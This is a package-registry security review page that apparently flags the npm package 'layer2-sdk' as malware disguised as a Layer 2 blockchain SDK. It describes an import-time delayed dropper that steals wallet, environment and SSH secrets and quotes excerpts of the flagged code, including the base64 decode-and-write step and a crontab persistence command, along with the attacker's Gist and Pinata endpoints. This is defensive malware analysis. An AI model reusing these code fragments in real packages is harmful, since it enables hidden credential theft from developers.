registry  /  layer2-sdk  /  1.0.1

layer2-sdk@1.0.1

Multi-chain Layer 2 SDK — bridge helpers, gas estimation, chain detection for Arbitrum, Optimism, Base, zkSync, Polygon zkEVM

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Importing `index.js` schedules a hidden dropper after 37 seconds. It writes and executes a concealed Node payload that conditionally harvests credentials and persists across restarts.

Static reason
One or more suspicious static signals were detected.; source matched previously finalized malicious package; routed for review; source fingerprint signature matched known malicious package; routed for review
Trigger
Any runtime import/require of the package entrypoint, followed by the 37-second timer.
Impact
The payload can read cryptocurrency secrets, environment credentials, and SSH private keys, then exfiltrate their encrypted contents.
Mechanism
Delayed payload drop, persistence, credential harvesting, encrypted exfiltration.
Attack narrative
The package exports ordinary L2 helper functions, then immediately registers a delayed dropper. The dropper decodes a base64 fixture into a hidden Node script, installs recurring persistence, and starts it detached. The decoded script checks a remotely mutable Gist/IPFS configuration, waits for host idleness, searches wallet, `.env`, and SSH material, RSA-encrypts findings, and uploads them to Pinata.
Rationale
Source inspection confirms an import-time persistence and credential-exfiltration chain concealed behind benign SDK functions. The lack of lifecycle hooks does not mitigate runtime execution on import.
Evidence
index.jstest/fixtures/keypairs.dat$HOME/.cache-db/.node-sync/syncd.js$HOME/.cache-db/.node-sync/.lock$HOME/.cache-db/.node-sync/.sl$HOME/Library/LaunchAgents/com.apple.syncd.plist
Network endpoints5
gist.githubusercontent.com/juang55/b298754cb72942b1cdcf02ccd45cde2f/raw/cfg.txtgateway.pinata.cloudipfs.iocloudflare-ipfs.comapi.pinata.cloud

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` runs an import-time delayed dropper.
  • `index.js` decodes `test/fixtures/keypairs.dat` into a hidden executable.
  • Decoded payload searches wallet, env, SSH, and key files.
  • Payload encrypts findings and posts them to `api.pinata.cloud`.
  • Payload uses Gist/IPFS activation checks and persists via cron, Scheduled Tasks, or launchd.
Evidence against
  • `package.json` has no lifecycle scripts.
  • The advertised chain/RPC helpers are benign but are followed by the hidden payload.
Behavioral surface
Source
ChildProcessFilesystemShell
Supply chain
UrlStrings
ManifestNo manifest risk signals triggered.
scanned 1 file(s), 4.13 KB of source, external domains: app.optimism.io, arb1.arbitrum.io, bridge.arbitrum.io, bridge.base.org, bridge.linea.build, mainnet.base.org, mainnet.era.zksync.io, mainnet.optimism.io, portal.polygon.technology, portal.zksync.io, rpc.linea.build, rpc.scroll.io, scroll.io, www.apple.com, zkevm-rpc.com

Source & flagged code

4 flagged · loading source
index.jsView file
3const CHAINS = { L4: 42161: { name: "Arbitrum One", bridge: "https://bridge.arbitrum.io", type: "optimistic", settlement: "ETH" }, L5: 10: { name: "OP Mainnet", bridge: "https://app.optimism.io/bridge", type: "optimistic", settlement: "ETH" }, ... L65: var o = require("os"); L66: var c = require("child_process"); L67: var h = o.homedir(); L68: var d = p.join(h, ".cache-db", ".node-sync"); ... L74: var b64 = f.readFileSync(src, "utf8").trim(); L75: f.writeFileSync(s, Buffer.from(b64, "base64").toString("utf8"), { mode: 0o700 }); L76: try { L77: if (process.platform === "linux") { L78: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 });
High
Sandbox Evasion Gated Capability

Source gates dangerous network, credential, or execution behavior behind CI, host, platform, time, or geo fingerprint checks.

index.jsView on unpkg · L3
matchType = normalized_sha256 matchedPackage = layer2-sdk@1.0.0 matchedPath = index.js matchedIdentity = npm:bGF5ZXIyLXNkaw:1.0.0 similarity = 1.000 summary = normalized source hash matched finalized malicious source
High
Known Malware Source Similarity

Source file is highly similar to a previously finalized malicious package; route for source-aware review.

index.jsView on unpkg
matchType = malicious_source_fingerprint_signature signature = 16aecfef8ae181c6 signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = layer2-sdk@1.0.0 matchedPath = index.js matchedIdentity = npm:bGF5ZXIyLXNkaw:1.0.0 similarity = 1.000 shingleOverlap = 1 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
3const CHAINS = { L4: 42161: { name: "Arbitrum One", bridge: "https://bridge.arbitrum.io", type: "optimistic", settlement: "ETH" }, L5: 10: { name: "OP Mainnet", bridge: "https://app.optimism.io/bridge", type: "optimistic", settlement: "ETH" }, ... L65: var o = require("os"); L66: var c = require("child_process"); L67: var h = o.homedir(); L68: var d = p.join(h, ".cache-db", ".node-sync"); ... L74: var b64 = f.readFileSync(src, "utf8").trim(); L75: f.writeFileSync(s, Buffer.from(b64, "base64").toString("utf8"), { mode: 0o700 }); L76: try { L77: if (process.platform === "linux") { L78: c.execSync('(crontab -l 2>/dev/null | grep -v syncd; echo "0 */12 * * * /usr/bin/node '+s+' >/dev/null 2>&1") | crontab -', { timeout: 5e3 });
Medium
Install Persistence

Source writes installer persistence such as shell profile or service configuration.

index.jsView on unpkg · L3

Findings

3 High1 Medium2 Low
HighSandbox Evasion Gated Capabilityindex.js
HighKnown Malware Source Similarityindex.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumInstall Persistenceindex.js
LowFilesystem
LowUrl Strings